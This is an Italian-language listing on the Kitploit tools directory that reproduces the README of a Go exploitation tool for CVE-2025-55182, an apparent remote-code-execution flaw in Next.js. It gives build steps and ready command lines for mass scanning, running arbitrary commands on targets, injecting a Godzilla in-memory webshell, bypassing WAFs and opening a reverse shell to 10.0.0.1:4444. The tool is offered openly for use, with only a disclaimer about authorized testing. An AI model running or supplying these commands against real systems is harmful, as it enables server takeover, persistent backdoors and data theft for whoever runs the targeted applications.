Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-POC — Scanner e strumento di sfruttamento basato su Go per CVE-2025-55182 (RCE in Next.js). Supporta scansione batch, esecuzione di comandi, iniezione di shell in memoria Godzilla, reverse shell e bypass WAF. | Kitploit
Strumenti/GitHubGitHub/luoqichen/cve-2025-55182-poc
Scanner di VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebBypass WAFPenetration TestingCommand and ControlSviluppo Payload
GitHub
luoqichen/cve-2025-55182-poc

CVE-2025-55182-POC

Scanner e strumento di sfruttamento basato su Go per CVE-2025-55182 (RCE in Next.js). Supporta scansione batch, esecuzione di comandi, iniezione di shell in memoria Godzilla, reverse shell e bypass WAF.

Vedi Repository
66 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 Next.js RCE Scanner

License

CVE-2025-55182 strumento di scansione e sfruttamento delle vulnerabilità per l'esecuzione remota di codice nelle applicazioni Next.js. Supporta scansione batch, esecuzione di comandi, iniezione di memory shell Godzilla e funzionalità di reverse shell.

⚠️ Questo strumento è destinato esclusivamente a scopi di ricerca sulla sicurezza e test autorizzati. Non utilizzarlo per scopi illegali.

Caratteristiche

  • Scansione multi-target: supporta singolo URL, elenco di file (un URL per riga) e cartelle contenenti più file .txt.
  • Concorrenza multi-thread: numero di thread personalizzabile per aumentare l'efficienza della scansione.
  • Verifica della vulnerabilità: verifica l'esistenza della vulnerabilità calcolando il prodotto di numeri casuali.
  • Esecuzione di comandi: esegue comandi di sistema arbitrari sul target vulnerabile (supporta Linux e Windows).
  • Iniezione di memory shell Godzilla: genera con un clic le informazioni di connessione per la memory shell Godzilla.
  • Reverse shell: supporta la funzionalità di reverse shell.
  • Salvataggio dei risultati: salva automaticamente gli URL sfruttati con successo e i dettagli in success.json e opzionalmente esporta gli URL vulnerabili in un file specificato.
  • Supporto proxy: proxy HTTP configurabile per l'integrazione con strumenti come Burp Suite.
  • Visualizzazione dell'avanzamento: mostra in tempo reale l'avanzamento della scansione, il tempo trascorso, il tempo rimanente stimato, ecc.
  • []

    Installazione

    Prerequisiti

    • Go 1.16 o superiore
    • Git

    Clona il repository

    root@kitploit:~
    git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
    cd cve-2025-55182-POC
    

    Compila

    root@kitploit:~
    go build -o cve-2025-55182 main.go
    

    Esegui

    root@kitploit:~
    ./cve-2025-55182 -h
    

    Utilizzo

    Descrizione dei parametri

    ParametroTipoDefaultDescrizione
    -ustringNessunoSingolo URL target (es. http://example.com:3000)
    -fstringNessunoFile contenente un elenco di URL (uno per riga)
    -dstringNessunoCartella contenente più file .txt
    -ostringNessunoFile di output (salva URL vulnerabili, uno per riga)
    -tint10Numero di thread concorrenti
    -toint10Timeout della richiesta (secondi)
    -cstringNessunoComando da eseguire (es. id)
    -mstringNessunoModalità: waf (abilita bypass WAF)
    -pstringNessunoProxy HTTP (es. http://127.0.0.1:8080)
    -gboolfalseAbilita iniezione memory shell Godzilla
    -rsstringNessunoIndirizzo reverse shell (formato IP:PORT)
    -dvboolfalseModalità dettagliata (stampa il processo di scansione per ogni URL)
    -esboolfalseModalità scansione informazioni sensibili

    Esempi

    Scansione singolo target

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000
    

    Scansione batch di target da file

    root@kitploit:~
    ./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
    

    Esecuzione di comandi

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000 -c "whoami"
    

    Utilizzo della memory shell Godzilla

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000 -g
    

    Dopo l'iniezione riuscita, lo strumento mostrerà l'URL di connessione, la password, la chiave e le informazioni dell'intestazione per Godzilla.

    Reverse shell

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
    

    Abilitazione del proxy

    root@kitploit:~
    ./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
    

    Descrizione dell'output

    • success.json: salva automaticamente i dettagli di tutti i target sfruttati con successo (inclusi output dei comandi, configurazione Godzilla, ecc.).
    • File specificato da -o: salva l'elenco degli URL vulnerabili (uno per riga).

    Durante la scansione vengono visualizzati in tempo reale una barra di avanzamento e le vulnerabilità rilevate, con statistiche finali.

    Note importanti

    1. Assicurati di avere l'autorizzazione: scansionare o attaccare sistemi altrui senza autorizzazione è illegale.
    2. Utilizzo del proxy: se devi visualizzare il traffico tramite Burp Suite, usa il parametro -p per impostare il proxy.
    3. Connessione Godzilla: dopo aver iniettato Godzilla con successo, connettiti usando il client Godzilla. Nota che sia la password che la chiave sono generate casualmente.
    4. Impostazione del timeout: per target con rete scarsa, puoi aumentare opportunamente il valore del parametro -to.

    Dichiarazione di esclusione di responsabilità

    Questo strumento è destinato esclusivamente a scopi di ricerca sulla sicurezza e test autorizzati. L'utente si assume ogni responsabilità legale. Gli sviluppatori non sono responsabili per eventuali usi impropri.

    License

    MIT

    Scarica lo strumento